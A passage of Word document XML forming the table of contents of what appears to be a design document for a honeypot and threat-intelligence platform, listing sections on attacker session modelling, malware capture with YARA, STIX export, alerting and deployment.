          <w:hyperlink w:anchor="_Toc69006" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">3. System Architecture Overview</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69006 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">14</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69007" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 Architectural Design</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69007 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">14</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69008" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Technologies and Services</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69008 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">17</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69009" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Design Models</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69009 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">19</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229436417" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1 Design Models for Object-Oriented Development Approach</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229436417 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">19</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229436418" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram (Attacker Session Lifecycle)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229436418 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">19</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229436419" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Class Diagram — Core Domain Model</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229436419 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">20</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229436420" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Swimlane Activity Diagram — AI-Powered Attack Classification (planned, 100%)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229436420 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">22</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229436421" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Sequence Diagram of Attacker Session:</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229436421 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">23</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229436422" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">State Transition Diagram  HoneypotSession Lifecycle</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc229436422 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">23</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69010" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Implemented Event and Threat-Intelligence Pipeline (60%)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69010 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">24</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9101" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">4.2 Activity Diagrams of the Implemented Modules (70%)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9101 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">25</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9102" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Cross-Protocol Device State Management (M1)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9102 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">25</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9103" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Multi-Protocol Connection Handling (M2)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9103 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">27</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9104" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Malware Capture and YARA Classification (M3)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9104 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">28</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9105" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Threat Report and STIX 2.1 Export (M4)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9105 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">30</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9106" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Real-Time Dashboard Update over WebSocket (M5)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9106 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">30</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9107" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Alert Notification with Threshold, De-duplication and Escalation (M6)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9107 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">32</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9108" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Secure Deployment and Network Isolation Start-up (M7)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9108 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">32</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9109" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — Backup, Verification and Restore (M7)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9109 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">33</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc9110" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity Diagram — ML Dataset Preparation with Weak Labels (M8)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc9110 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">34</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69011" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Data Design</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69011 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">35</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69012" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">5.1 Data Dictionary</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69012 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">36</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69013" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Human Interface Design</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69013 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">42</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69014" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">6.1 Screen Images</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69014 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">43</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69015" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">6.2 Screen Objects and Actions</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69015 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">45</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69016" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">7. Implementation</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69016 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">47</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69017" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">7.1 Algorithms</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69017 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">47</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69018" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A1 – Unified Event Logging</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69018 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">47</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
